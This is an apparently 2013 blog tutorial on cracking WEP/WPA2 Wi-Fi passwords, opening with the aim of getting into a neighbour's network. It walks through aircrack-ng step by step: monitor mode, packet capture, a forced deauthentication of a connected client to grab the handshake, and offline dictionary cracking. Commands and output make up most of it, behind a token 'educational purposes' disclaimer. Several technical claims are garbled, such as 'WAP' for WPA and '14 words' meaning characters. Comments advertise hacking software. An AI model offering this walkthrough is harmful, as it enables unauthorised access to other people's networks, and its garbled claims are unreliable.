Thursday, 7 November 2013


Hack wifi/WEP/WPA2 password using aircrack-ng

  • Thursday, 7 November 2013
  • Taran Saini
  • wifi hack
    Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng.

    Hacking wireless wifi passwords

    The most common type of wireless security are Wired Equivalent Privacy (WEP) and
    Wi-Fi protected Access (WPA).
    WEP was the original encryption standards for wireless so that wireless networks can be secured as 
    wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or 
    airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
    encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
    Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on
    security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
    makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be
    cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .

    Securing Wireless Network
    The first step of securing wireless connection is simply using a long random passwords atleast of 
    14 characters. Now if your wifi device supports for WPA2 than use it, as many users don’t know that
    their device supports for many security encryption techniques.  Check your router security techniques supported which is in its configuration page.
    If you don’t know how to edit routers setting than just open your browser and type in
    addressbar and here you will get your routers configuration, where you can select.

    Cracking Wireless Network
    As we have read above this is an easy task, we just have to use our network card in monitor mode so
    as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using  aircrack-ng. But only small number if cards support this mode under windows.
    But you can use live CD of any linux OS (commonly BackTrack ) or install linux OS as virtual machine.

    List of compatible cards.

    Now download aircrack-ng for linux or windows platform from HERE.
    The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
    cracking. The ones we will be using are:

    airmon-ng     - script used for switching the wireless network card to monitor mode
    airodump-ng - for WLAN monitoring and capturing network packets
    aireplay-ng   - used to generate additional traffic on the wireless network
    aircrack-ng   - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.

    Using aircrack-ng

    First, put the card in monitor mode :

    root@bt:~# airmon-ng

    Interface       Chipset         Driver

    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0)
    ath1            Atheros         madwifi-ng VAP (parent: wifi0)
    wlan0           Ralink 2573 USB rt73usb - [phy0]

    root@bt:~# airmon-ng start wlan0

    Interface       Chipset         Driver

    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0)
    ath1            Atheros         madwifi-ng VAP (parent: wifi0)
    wlan0           Ralink 2573 USB rt73usb - [phy0]
                                    (monitor mode enabled on mon0)

    Ok, we can now use interface mon0
    Let’s find a wireless network that uses WPA2 / PSK :

    root@bt:~# airodump-ng mon0

     CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                        

     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID          

     00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet   

     BSSID              STATION            PWR   Rate   Lost  Packets  Probe         

     00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

    Stop airodump-ng and run it again, writing all packets to disk :
    airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

    At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
    complete, or deauthenticate an existing client and thus force it to reassociate.  Time is money, so let’s
    force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

    root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
    13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
    13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

    As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
    CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7        

     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  

     00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet         

     BSSID              STATION            PWR   Rate   Lost  Packets  Probe 

     00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

    Stop airodump-ng and make sure the files were created properly
    root@bt:/# ls /tmp/wpa2* -al
    -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
    -rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
    -rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

    Form this point forward, you do not need to be anywhere near the wireless network. All cracking will
    happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact,
    I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.
    Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.
    There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one
    that is very slow, but guarantees that you will find the key at some point in time.

    The first option is by using a worklist/drstionary file.  A lot of these files can be found on the internet ( or on packetstorm (see the archives)), or can be generated with tools such 
    as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the
    worklist and feed it the .cap fie that contains the WPA2 Handshake.
    So if your wordlist is called word.lst (under /tmp/wordlists), you can run

    aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

    The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In 
    other words, you may get lucky and get the key very fast, or you may not get the key at all.

    The second method (bruteforcing) will be successfull for sure, but it may take ages to complete.
    Keep in mind, a WPA2 key can be up to 64 characters, So in theory you would to build every
    password combination with all possible character sets and feed them into aircrack.

    Hope you enjoy(-_-) this post.!

    Note: This tutorial is only for Educational Purposes.

    4 Responses to “ Hack wifi/WEP/WPA2 password using aircrack-ng ”

    deep jatt said...
    7 November 2013 at 06:14


    Taran Saini said...
    7 November 2013 at 07:02

    thankss deep jatt

    rich4hacker said...
    7 January 2014 at 05:16

    hack wifi password

    hackertr said...
    2 February 2014 at 05:47

    hack wireless internet password within 5 minutes, free download wifi hacking software

    *Important - If you want to be informed of any replies to your comment, check the "Subscribe By Email" before submitting. Please Do Not Spam

    Post a Comment